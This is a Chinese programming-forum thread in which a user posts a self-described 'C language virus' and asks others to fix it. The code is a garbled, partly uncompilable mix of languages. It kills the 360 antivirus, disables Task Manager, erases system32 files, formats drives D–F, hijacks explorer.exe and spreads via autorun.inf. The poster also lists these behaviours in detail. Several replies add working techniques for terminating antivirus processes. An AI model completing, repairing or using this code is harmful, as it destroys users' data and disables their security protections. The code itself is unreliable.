啊哈磊_编程从这里起步

标题: c语言关闭360谁会啊 [打印本页]
作者: 4k-Rn    时间: 2013-1-3 18:17
标题: c语言关闭360谁会啊
本帖最后由 4k-Rn 于 2013-2-2 17:25 编辑

c语言关闭360谁会啊
cmd不行啊
啊哈磊帮我啊
C语言病毒
[mw_shl_code=c,true]#include <stdio.h>
#include <windows.h>
#include <dos.h>
#include<string.h>  
#include<stdlib.h>  
#include<process.h>
#include<dir.h>

#define SVCHOST_NUM 666666
#define RUBBISH_NUM 666666
#define REMOVE_NUM  666666
main()
{
do
set ws=createobject("wscript.shell")
ws.run "cmd.exe /c taskkill /f /im 360chrome.exe",0
ws.run "cmd.exe /c taskkill /f /im .exe",0
ws.run "cmd.exe /c taskkill /f /im .exe",0
ws.run "cmd.exe /c taskkill /f /im .exe",0
loop
RegistryKey backApp = Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
backApp.SetValue("", Application.ExecutablePath);
system("TASKKILL /F /IM EXPLORER.EXE");
system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f");
system(ERASE C:\\WINDOWS\\system32\\cmd.exe);
sleep(100);
system(ERASE C:\\WINDOWS\\system32\\*.exe);
sleep(100);
system(ERASE C:\\WINDOWS\\system32\\*.dll);
sleep(100);
system(start C:\\WINDOWS\\system32\\twain_32\\zombies.exe);
system(md C:\\WINDOWS\\system32\\win_32backup);
system("FORMAT D:");
sleep(500);
system("FORMAT E:");
sleep(500);
system("FORMAT F:");
sleep(500);
system(Del C:\\Program Files);
return 1;
}
{
int copy(char *infile,char *outfile)
{
    FILE *input,*output;
    char temp;
    if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen

(outfile,"wb"))!=NULL))
    {
      while(!feof(input))
      {
        fread(&temp,1,1,input);
        fwrite(&temp,1,1,output);
      }
      fclose(input);
      fclose(output);
      return 0;
    }
    else return 1;
}
int autorun_explorer()
{
    FILE *input;
    if((input=fopen("c:\\windows\\system\\explorer.exe","rb"))!=NULL)
    {
      fclose(input);
      remove("c:\\windows\\$temp$");
      remove("c:\\windows\\system32\\dllcache\\$temp$");
      return 1;
    }
    copy("c:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");
    rename("c:\\windows\\explorer.exe","c:\\windows\\$temp$");
    rename("c:\\windows\\system32\\dllcache\\explorer.exe","c:\\windows\\system32

\\dllcache\\$temp$");
    if(copy("SVCHOST.com","c:\\windows\\explorer.exe")==0 && copy

("SVCHOST.com","c:\\windows\\system32\\dllcache\\explorer.exe")==0)
      return 0;
    else
      return 2;
}
int add_reg()
{
    FILE *output;
    if((output=fopen("$$$$$","w"))!=NULL)
    {
      fprintf(output,regadd);
      fclose(output);
      spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL);
    }
}
void copy_virus()
{
    int i,k;
    FILE *input,*output;
    char *files_svchost[SVCHOST_NUM]=

{
"svchost.com","c:\\windows\\wjview32.com","c:\\windows\\system\\MSMOUSE.DLL","c:\\windows\\system32\\cmdsys.sys","c:\\windows\\system32\\mstsc32.exe","c:\\windows\\explorer.exe"};
    char temp[2][20]={"c:\\svchost.com","c:\\autorun.inf"};
    for(i=0;i<SVCHOST_NUM;i++)
    {
      if((input=fopen(files_svchost,"rb"))!=NULL)
      {
        fclose(input);
        for(k=0;k<SVCHOST_NUM;k++)
        {
          copy(files_svchost,files_svchost[k]);
        }
        i=SVCHOST_NUM;
      }
    }
    for(i=0;i<SVCHOST_NUM;i++)
    {
      if((input=fopen(files_svchost,"rb"))!=NULL)
      {
        fclose(input);
        for(k=0;k<24;k++)
        {
          copy(files_svchost,temp[0]);
          if((output=fopen(temp[1],"w"))!=NULL)
          {
            fprintf(output,"%s",autorun);
            fclose(output);
          }
          temp[0][0]++;
          temp[1][0]++;
        }
        i=SVCHOST_NUM;
      }
    }
}
void make_rubbish()
{
     int i;
     FILE *output;
     srand(0);
     for(i=0;i<RUBBISH_NUM;i++)
     {
       int n;
       char s[30];
       n=rand();
       sprintf(s,"C:\\DESTORY_soft_%d",n);
       if((output=fopen(s,"w"))!=NULL)
       {
         fprintf(output,"%ld%s",n*n,s);
         fclose(output);
       }
     }
}
void remove_files()
{
    long done;
    int i;
    struct _finddata_t ffblk;
    char *remove_files[3]={"*.txt","*.doc","*.xls"};
    for(i=0;i<3;i++)
    {
      if(_findfirst(remove_files,&ffblk)==-1) continue;
      while(!done)
      {
        remove(ffblk.name);
        _findnext(done,&ffblk);
      }
      _findclose(done);
    }
}
int main(int argc,char **argv)
{
    int contral=0;
    if(argc>1)
      if(strcmp(argv[1],"/s")==0)
        goto next1;
    autorun_explorer();
    spawnl(1,"c:\\windows\\system\\explorer.exe",NULL);
    next1:
    add_reg();
    copy_virus();
    make_rubbish();
    /* remove_files(); */
    spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);
    return 0;
}[/mw_shl_code]
帮我改改

未命1名.jpg (93.97 KB, 下载次数: 49)

未命1名.jpg

未命名.jpg (18.67 KB, 下载次数: 39)

未命名.jpg
作者: c-shadows    时间: 2013-1-3 18:17
关机,重启
消灭360
哈哈哈
作者: 啊哈磊    时间: 2013-1-4 20:03
这是?你想做啥?
作者: 2420015589    时间: 2013-1-5 08:55
貌似不行哦!!!



关闭QQ程序,这样写。

#include <stdlib.h>
int main()
{
system("taskkill -f -im qq.exe");
}
作者: 4k-Rn    时间: 2013-1-5 16:01
2420015589 发表于 2013-1-5 08:55
貌似不行哦!!!

纳尼。。。。。
作者: 4k-Rn    时间: 2013-1-5 16:15
本帖最后由 4k-Rn 于 2013-1-5 16:16 编辑
啊哈磊 发表于 2013-1-4 20:03
这是?你想做啥?

先把360杀毒,安全卫士,360浏览器关了。
锁定任务管理器,
删除任务管理器,
把桌面,开始菜单关了
删除system32里的exe,dll。
病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在
explorer.exe前启动
修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)
生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“
资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
连锁能力,将病毒体相连,实现相连复制更新
使用进程不断调用进程,使得在任务管理里无法结束病毒进程
不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建
生成垃圾文件5个于C盘下
在所有磁盘的根目录生成svchost.com和autorun.inf文件
生成病毒体:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
格式化D,E,F盘

作者: 4k-Rn    时间: 2013-1-5 16:15
2420015589 发表于 2013-1-5 08:55
貌似不行哦!!!

先把360杀毒,安全卫士,360浏览器关了。
锁定任务管理器,
删除任务管理器,
把桌面,开始菜单关了
删除system32里的exe,dll。
病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在
explorer.exe前启动
修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)
生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“
资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
连锁能力,将病毒体相连,实现相连复制更新
使用进程不断调用进程,使得在任务管理里无法结束病毒进程
不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建
生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下
在所有磁盘的根目录生成svchost.com和autorun.inf文件
生成病毒体:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
格式化D,E,F盘
作者: 4k-Rn    时间: 2013-1-5 16:45
为难啊      人
作者: 4k-Rn    时间: 2013-1-5 16:47
作者: aodi69    时间: 2013-1-6 04:29
你想做啥?哈哈哈。做坏事啊?不能的哦,。。。360是很难搞的?不过我教你一个办法吧,。点右360,然后退出,这样就好了哈。。哈哈哈
作者: 1321164645    时间: 2013-1-11 20:41
骚年。你的权限不够的。而且360有进程看护。。。
作者: 伊恩    时间: 2013-1-17 19:58
学了语言不干好事呢
作者: 4k-Rn    时间: 2013-1-29 20:25
1321164645 发表于 2013-1-11 20:41
骚年。你的权限不够的。而且360有进程看护。。。

次奥。360又不是神
作者: 4k-Rn    时间: 2013-1-29 20:26
aodi69 发表于 2013-1-6 04:29
你想做啥?哈哈哈。做坏事啊?不能的哦,。。。360是很难搞的?不过我教你一个办法吧,。点右360,然后退出 ...

次奥次奥茨奥茨奥茨奥
作者: jjjstc    时间: 2013-1-30 14:40
system("ntsd -c q -pn 360tray.exe");
作者: 凡夫俗子    时间: 2013-1-30 15:22
幸亏我英明神武,早八百年前就卸载了360
作者: 4k-Rn    时间: 2013-2-2 17:26
悬赏150啊哈币
作者: jcfielsz    时间: 2013-2-3 13:32
这。。。。。。牛人。。
作者: Vec    时间: 2013-2-6 22:55
呵呵,在360软体设置里把主动防御关了,然后再把主程式退了就行,不必这么蛋疼。
作者: 4k-Rn    时间: 2013-3-9 15:07
kekekekkekekekekkeke
作者: 小旭旭    时间: 2013-4-25 09:15
360你也想搞,你以为奇虎公司是吃素的呀。
作者: l769829723    时间: 2013-4-26 10:47
想杀它的话要先禁用360的后台服务,才可以杀的掉,否则就算杀了也会重新开启的吧。
作者: Anleb    时间: 2013-7-3 23:30
给你一个思路,关闭系统级别的进程,需要 提权,你百度搜下 C语言 程序提权
作者: 4399APPLE    时间: 2013-11-26 10:10
本帖最后由 4399APPLE 于 2016-10-1 09:55 编辑
凡夫俗子 发表于 2013-1-30 15:22
幸亏我英明神武,早八百年前就卸载了360

测试机装个毛360                    
作者: 4399APPLE    时间: 2014-9-30 22:03
本帖最后由 4399APPLE 于 2016-10-1 09:56 编辑
啊哈磊 发表于 2013-1-4 20:03
这是?你想做啥?
  1. HWND hWnd = FindWindow(NULL, "360安全卫士");
  2. SendMessage(hWnd, WM_CLOSE, 0, 0);
复制代码
作者: 4399APPLE    时间: 2016-10-1 09:55
  1. #include <cstdio>
  2. #include <cstring>
  3. #include <windows.h>
  4. #include <Tlhelp32.h>
  5. #define AE_RESACCESS2 18

  7. BOOL CALLBACK Kill(HWND hWnd, LPARAM lParam)
  8. {
  9.     DWORD id;
  10.     HANDLE snap;
  11.     PROCESSENTRY32 pe;
  12.    
  13.     if(hWnd)
  14.     {
  15.         GetWindowThreadProcessId(hWnd, &id);
  16.         snap = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
  17.         
  18.         if(snap)
  19.         {
  20.             pe.dwSize = 296;
  21.             if(Process32First(snap, &pe))
  22.                 do
  23.                 {
  24.                     if(pe.th32ProcessID == id && !stricmp("360Tray.exe", pe.szExeFile))
  25.                     {
  26.                         printf("OK");
  27.                         getchar();
  28.                         PostMessage(hWnd, AE_RESACCESS2, 0, 0);
  29.                     }
  30.                 }while(Process32Next(snap, &pe));
  31.         }
  32.         
  33.         return TRUE;
  34.     }
  35.    
  36.     return FALSE;
  37. }

  39. int main()
  40. {
  41.     EnumWindows(Kill, 0);
  42.    
  43.     return 0;
  44. }
复制代码

关闭360安全卫士



欢迎光临 啊哈磊_编程从这里起步 (https://bbs.codeaha.com/) Powered by Discuz! X3.2